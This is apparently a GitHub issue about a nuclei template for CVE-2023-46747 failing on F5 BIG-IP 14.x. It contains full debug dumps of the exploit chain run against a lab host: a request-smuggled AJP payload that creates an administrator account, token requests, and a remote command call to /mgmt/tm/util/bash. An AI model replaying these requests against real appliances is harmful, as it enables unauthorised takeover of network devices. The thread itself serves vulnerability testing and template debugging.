CVE-2023-46747 template failed to test on version 14.x

[W01fh4cker]

Issue description:

When I built a local environment to test the f5-big-ip vulnerability CVE-2023-46747, both the 15.x and 16.x versions of f5-big-ip could be reproduced successfully, but in the 14.x version of f5 -big-ip failed to reproduce. The f5-big-ip version I tested is 14.1.2.6.

Anything else:

Next is the result of nuclei debug:

C:\Users\Administrator\CVE-2023-46747>nuclei.exe -u https://192.168.149.129:8443 -t CVE-2023-46747.yaml --debug > test.txt

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.2

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 25
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/tmui/login.jsp

POST /tmui/login.jsp HTTP/1.1
Host: 192.168.149.129:8443
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded

204
HTTP/1.1/tmui/Control/form      127.0.0.1       localhost       localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0�
        localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=ZwdUY&name_before=&passwd=M6seB3j8CnrN&passwd_before=&finished=x&finished_before=�
0

[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/tmui/login.jsp

HTTP/1.1 200 OK
Content-Length: 6950
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Sun, 26 Nov 2023 19:42:30 GMT
F5-Login-Page: true
Pragma: no-cache
Server: Apache
Set-Cookie: JSESSIONID=B54864AAFEB1852BEE2350721085848D; Path=/tmui; Secure; HttpOnly
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>BIG-IP&reg; - bigip1 (192.168.149.129)</title>
        <meta http-equiv="content-type" content="text/html; charset=utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="expires" content="-1" />
        <meta name="copyright" content="(c) Copyright 1996-2018, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
        <meta name="description" content="BIG-IP&reg; Configuration Utility" />
        <meta name="author" content="F5 Networks, Inc." />
        <meta name="robots" content="noindex,nofollow" />
    <link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
    <link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
    <script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>

        <script type="text/javascript" charset="utf-8">
                // Break out of the XUI wrapper or frameset
        if (window.location != window.top.location) {
            window.top.location = window.location;
        }

                window.onload = function(e) {
                        // Display error modal if necessary (but don't show it if they've failed authentication
                        // because they just saw the message on the original page load).

                        // Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
                        // Also delete these state cookies if we're rebooting.
                        var authCookieExists = false;
                        //Delete partition & folder cookies, no matter what the situation, to handle cases
                        // where the user's folder/partition permissions may have been changed. bug 415304
                        delCookie("F5_CURRENT_PARTITION");
            delCookie("F5_CURRENT_FOLDER");

                        if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
                                deleteStatefulCookies();
                        }
                        // Reboot
                        if (window.location.pathname.indexOf('reboot') != -1) {
                                frames['contentframe'].location.replace(path_rebootModal);
                                document.getElementById('legallink').style.display = 'none';
                        }
                        // Welcome
                        else {
                                frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
                                var loginFormObj = document.getElementById('loginform');
                                loginFormObj.style.display = 'block';
                                var msgText;
                                switch (getUrlValue('msgcode')) {
                                        case "1":
                                        msgText = 'Login failed';
                                        break;
                                        case "2":
                                        msgText = 'Your credentials are no longer valid. Please log in again.';
                                        break;
                                        case "3":
                                        msgText = 'You have been logged out. Please log in again.';
                                        break;
                                        case "4":
                                        msgText = 'Remote authentication server unreachable; local authentication failed.';
                                        break;
                                        case "5":
                                        msgText = 'Password changed successfully.';
                                        break;
                                }
                                if (msgText) {
                                        var msgObj = document.getElementById('message');
                                        msgObj.style.display = 'block';
                                        msgObj.innerHTML = msgText;
                                }
                                // Focus on username field
                                var usernameObj = document.getElementById('username');
                                usernameObj.focus();
                                if (usernameObj.select) {
                                        usernameObj.select();
                                }
                        }
                };

                function deleteStatefulCookies() {
                        delCookie("F5_CURRENT_PARTITION");
            delCookie("F5_CURRENT_FOLDER");
                        delCookie("f5_refreshpage");
                        delCookie("f5currenttab");
                        delCookie("f5formpage");
                        delCookie("f5mainmenuopenlist");

                }

                function checkFormBeforeSubmit() {
                        // delete any stateful cookies if the username being submitted is different than the previously logged-in user.
                        var enteredUsername = document.getElementById('username').value;
                        var previousUsername = "";
                        if (enteredUsername != previousUsername) {
                                deleteStatefulCookies();
                        }
                        return true;
                }
    </script>
</head>
<body>
    <div id="wrapper">
        <div id="window">
            <div id="banner">
                <div id="logo">

                <!--[if gt IE 6]><!-->
                    <img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
                <!--<![endif]-->
                <!--[if IE 6]>
                    <img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
                <![endif]-->

                </div>
                <h1>
                    BIG-IP
                    Configuration Utility</h1>
                <h2>F5 Networks, Inc.</h2>

            </div>
            <div id="sidebar">
                <div id="deviceinfo">
                    <label>Hostname</label>
                    <p title="bigip1">bigip1</p>
                    <label>IP Address</label>
                    <p title="192.168.149.129">192.168.149.129</p>
                </div>
                <p id="message" class="badtext"></p>
                <form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
                    <label>Username</label>
                    <input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
                    <label>Password</label>
                    <input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
                    <button type="submit" tabindex="3">Log in</button>
                </form>
            </div>
            <iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
        </div>
        <div id="copyright">(c) Copyright 1996-2018, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
                        <a id="legallink"
            href="tmui/login/legal.html"
            target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
        </div>
    </div>
        <div id="modal" style="display: none;">
                <div class="overlay"></div>
                <div class="content">
                        <p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
                        <p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
                        <button onclick="document.getElementById('modal').style.display='none';">Continue</button>
                </div>
        </div>
</body>
</html>

[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

PATCH /mgmt/tm/auth/user/ZwdUY HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic WndkVVk6TTZzZUIzajhDbnJO
Content-Type: application/json
Accept-Encoding: gzip

{"password": "zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 26 Nov 2023 19:42:31 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/shared/authn/login

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip

{"username":"ZwdUY", "password":"zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/shared/authn/login

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 216
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:33 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"Authentication failed.","originalRequestBody":"{\"username\":\"ZwdUY\",\"generation\":0,\"lastUpdateMicros\":0}","referer":"192.168.149.1","restOperationId":6544341,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/util/bash

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip

{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/util/bash

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 136
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:35 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.149.1","restOperationId":6544407,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

PATCH /mgmt/tm/auth/user/ZwdUY HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic WndkVVk6TTZzZUIzajhDbnJO
Content-Type: application/json
Accept-Encoding: gzip

{"password": "zrvB3p0FrGJRhz"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/auth/user/ZwdUY

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 26 Nov 2023 19:42:35 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/shared/authn/login

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 49
Content-Type: application/json
Accept-Encoding: gzip

{"username":"ZwdUY", "password":"M6seB3j8CnrN"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/shared/authn/login

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 216
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:37 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"Authentication failed.","originalRequestBody":"{\"username\":\"ZwdUY\",\"generation\":0,\"lastUpdateMicros\":0}","referer":"192.168.149.1","restOperationId":6544457,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.149.129:8443/mgmt/tm/util/bash

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.149.129:8443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip

{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.149.129:8443/mgmt/tm/util/bash

HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 136
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Sun, 26 Nov 2023 19:42:39 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.149.1","restOperationId":6544515,"kind":":resterrorresponse"}
[INF] No results found. Better luck next time!

[ritikchaddha]

Hello @W01fh4cker, Are you still facing any issues with this template? Please feel free to share more information.

[W01fh4cker]

Hello @W01fh4cker, Are you still facing any issues with this template? Please feel free to share more information.

Yes, this template is not applicable to all F5 versions. For specific information, please refer to https://twitter.com/joel_land/status/1729147886615818732 and https://xz.aliyun.com/t/12944. I tested the 14.x version with the vulnerability described in the official report, but could not exploit it successfully.